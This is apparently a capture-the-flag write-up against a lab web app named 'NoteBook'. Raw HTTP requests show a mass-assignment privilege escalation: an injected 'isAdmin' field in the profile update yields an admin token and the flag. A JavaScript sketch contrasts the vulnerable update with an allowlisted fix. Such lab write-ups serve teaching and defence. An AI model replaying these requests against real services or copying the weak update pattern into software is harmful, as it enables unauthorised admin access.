NoteBook

Register

POST /api/register HTTP/1.1
Host: 192.168.238.230:5000
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/json
Content-Length: 82

{"username":"remo",
"email":"remo@remo.com","password":"remo123$","isAdmin":true}

Now let’s log in

POST /api/login HTTP/1.1
Host: 192.168.238.230:5000
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/json
Content-Length: 64

{
"email":"remo@remo.com","password":"remo123$","isAdmin":true}

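Now let’s update the profile! The x-auth-token sent with this request decodes to a payload with "isAdmin":"false", so the isAdmin value sent at registration and login did not end up in the token. The profile update sends the field again, this time as the string "true".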

PUT /api/profile HTTP/1.1
Host: 192.168.238.230:5000
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
x-auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjp7ImlkIjoxNSwiZW1haWwiOiJyZW1vQHJlbW8uY29tIiwiaXNBZG1pbiI6ImZhbHNlIn0sImlhdCI6MTc2ODYxOTk1NiwiZXhwIjoxODU1MDE5OTU2fQ.4HDKShkBgiry66eP1Kyc6-5GGQ-zTpqsWM79nebp0II
Connection: keep-alive
Content-Type: application/json
Content-Length: 62

{
"username":"remo","email":"remo@remo.com","isAdmin":"true"}

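Added example, not part of the original notes and not the target application's code: a sketch of the mass-assignment pattern that would let the PUT body above change isAdmin, next to an allowlisted update that drops it. The function names, the in-memory record and the loose role check are assumptions made for illustration.

```javascript
// Hypothetical model of the profile update; not the target application's code.
const EDITABLE_FIELDS = ['username', 'email'];

// Constructed record matching the claims in the token sent with the PUT request.
function sampleUser() {
  return { id: 15, username: 'remo', email: 'remo@remo.com', isAdmin: 'false' };
}

// Weak pattern: every key in the request body is copied onto the record,
// so a client-supplied "isAdmin" replaces the server-side value.
function updateProfileWeak(user, body) {
  return Object.assign({}, user, body);
}

// Hardened pattern: copy only allowlisted string fields and return the
// rejected keys so the handler can log them or answer 400.
function updateProfileHardened(user, body) {
  const updated = { ...user };
  const rejected = [];
  for (const [key, value] of Object.entries(body)) {
    if (EDITABLE_FIELDS.includes(key) && typeof value === 'string') {
      updated[key] = value;
    } else {
      rejected.push(key);
    }
  }
  return { user: updated, rejected };
}

// Assumed loose role check: the string "true" passes it.
function isAdminLoose(user) {
  return String(user.isAdmin) === 'true';
}

// Strict role check: only the boolean true, set server-side, passes.
function isAdminStrict(user) {
  return user.isAdmin === true;
}

// Body of the PUT /api/profile request shown above.
const putBody = JSON.parse('{"username":"remo","email":"remo@remo.com","isAdmin":"true"}');
const weak = updateProfileWeak(sampleUser(), putBody);
const hardened = updateProfileHardened(sampleUser(), putBody);
console.log(isAdminLoose(weak), isAdminLoose(hardened.user), hardened.rejected);
```

Role changes belong on a separate endpoint that checks the caller's existing privileges, and the role check should read the value from the server-side record rather than trusting a field the client could set.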

Now let’s get the flag! The x-auth-token sent with this request decodes to a payload with "isAdmin":"true".

GET /admin/flag HTTP/1.1
Host: 192.168.238.230:5000
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
x-auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjp7ImlkIjoxNSwiZW1haWwiOiJyZW1vQHJlbW8uY29tIiwidXNlcm5hbWUiOiJyZW1vIiwiaXNBZG1pbiI6InRydWUifSwiaWF0IjoxNzY4NjIxMDE0LCJleHAiOjE4NTUwMjEwMTR9.anVWK8McWSfDkWAvEkCtPgC61XK6LIBMOkQWX315VU0
Connection: keep-alive
Content-Type: application/json
Content-Length: 0

Flag: a082e612de1e2829c636cc0a6496ca7b